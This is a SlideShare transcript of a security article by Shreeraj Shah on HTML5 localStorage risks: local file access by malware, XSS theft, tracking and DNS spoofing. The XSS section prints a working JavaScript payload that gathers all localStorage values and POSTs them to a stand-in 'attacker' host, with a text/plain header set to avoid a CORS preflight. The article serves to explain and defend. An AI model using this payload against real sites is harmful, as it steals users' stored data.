HTML5 localstorage Attack Vectors & SecurityBy Shreeraj Shah (Blueinfy & iAppSecure)Storage can expand the attack surface ...
Hence, sensitive data stored on localstorage is at significant risk from various standpoints even though itis of great val...
In this loop all variables from localStorage can be obtained using getItem() call and values can be fetchedalong with the ...
Hence, the attacker is successful in enumerating values and sending them back to the server. It ispossible to apply the sa...
Upcoming SlideShare
Loading in …5
×

Html5 localstorage attack vectors

6,329 views

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
6,329
On SlideShare
0
From Embeds
0
Number of Embeds
2,396
Actions
Shares
0
Downloads
79
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Html5 localstorage attack vectors

  1. 1. HTML5 localstorage Attack Vectors & SecurityBy Shreeraj Shah (Blueinfy & iAppSecure)Storage can expand the attack surface for application users. Storage brings both privacy and securityconcerns for end clients within their browsers. It is imperative to have an appropriate defense andproper protection in place to address this set of issues. The following attacks are possible:Attack agent fetching sensitive informationLocalStorage is created on the physical hard drive and this file can be accessed by malware or virus thathas access to the underlying OS. For example, as in the case of Chrome, a SQLite file is created in theuser directory as shown below.Figure 1 – Dir listing of localStorage SQLite files in the user directory in ChromeIt is easy to open files in any SQLite client application and see information stored by the application onthe local system as shown below.Figure 2 – Viewing localStorage files in SQL client application
  2. 2. Hence, sensitive data stored on localstorage is at significant risk from various standpoints even though itis of great value from a programming perspective.Attack through XSSXSS can be a lethal attack vector for storage. All storage would be accessible using JavaScript. A cookiemarked as HttpOnly would not available to and from JavaScript. But, with sessionStorage andlocalStorage, the game changes a bit. Hence, if an application is discovered to be vulnerable to XSS, anattacker can execute a payload to fetch all session and local storage values and send them back to hisown site. Sensitive information is compromised and the attacker gets access to the entire set ofinteresting information. This XSS can be of any type – reflected, persistent or DOM-based.For example, here is a simple payload.var xmlhttp=false;var ls = "";if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ ls += "("+i +"-"+localStorage.getItem(i)+")"; }}function sendreq(){ xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "http://attacker/msg/"+ls+"", true); // Using text/plain to bypass preflight call xmlhttp.setRequestHeader("Content-Type", "text/plain"); xmlhttp.send(ls);}sendreq();Let’s look at the first loop shown below.if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ ls += "("+i +"-"+localStorage.getItem(i)+")"; }}
  3. 3. In this loop all variables from localStorage can be obtained using getItem() call and values can be fetchedalong with the key. All of these get stored in the “ls” variable as shown below./Figure 3 – Enumerating the contents of the variable “ls”In the next call, the attacker can send this harvested value back to his own server and use the XHR callwith “text/plain” to bypass pre-flight call as shown below.function sendreq(){ xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "http://attacker/msg/"+ls+"", true); // Using text/plain to bypass preflight call xmlhttp.setRequestHeader("Content-Type", "text/plain"); xmlhttp.send(ls);}Finally, when the sendreq() call is made, the attacker gets the following response on the browser stack.Figure 4 – browser stack response to the sendreq() call
  4. 4. Hence, the attacker is successful in enumerating values and sending them back to the server. It ispossible to apply the same routine to sessionStorage as well using that object. This technique is acompletely blind enumeration. No information is required for the application; if the application uses thelocalStorage object, then loop through all objects to fetch values based on the type as shown below.for(i in localStorage){ ls += "("+i +"-"+localStorage.getItem(i)+")"; }It is important to note that applications running with HTML5 use single DOM and when the attackerfinds DOM-based access then it is child’s play for him to inject and exploit DOM-based calls. These callscould come from a third party server or the content could come from untrusted sources.Tracking user and invading privacyLocalStorage is permanent and it gets glued to the browser. An attacker or an advertising company candrop a localStorage identifier for a specific domain and then have full tracking available through APIs.These API calls can be passed to their respective sites to track users across the world since it is glued tosingle browser. A company with multiple server access as an ad server can start tracking a user from asingle domain and craft their advertising game plan. This invades the privacy of the user. UsinglocalStorage, a user could be mapped to his/her real identity and would allow persistent tracking usingJavaScript. Currently, the privacy area is a little ignored from HTML5 point of view; in future this may bea cause of concern for an end user.DNS spoofing attack vectorLocalStorage is accessible based on the origin or domain. Hence, if DNS is spoofed, the attacker getsaccess to the browser session. In this case the localStorage created by targetting the application canprovide access to the sensitive data stored on the browser. This can lead to a potential security breachand data theft. For example, if a bank stores an identifier, profile and the last 5 transactions on thelocalStorage, the attacker can get access to this sensitive set of information via DNS spoofing at the ISPend. The application should defend their implementation by using TLS and that should ensure that thecorrect certificate is present before communicating and executing JavaScript on the browser session.About AuthorShreeraj ShahFounder & DirectorBlueinfy and iAppSecurewww.blueinfy.com | www.iappsecure.comBlog: http://shreeraj.blogspot.comTwitter: @shreeraj

×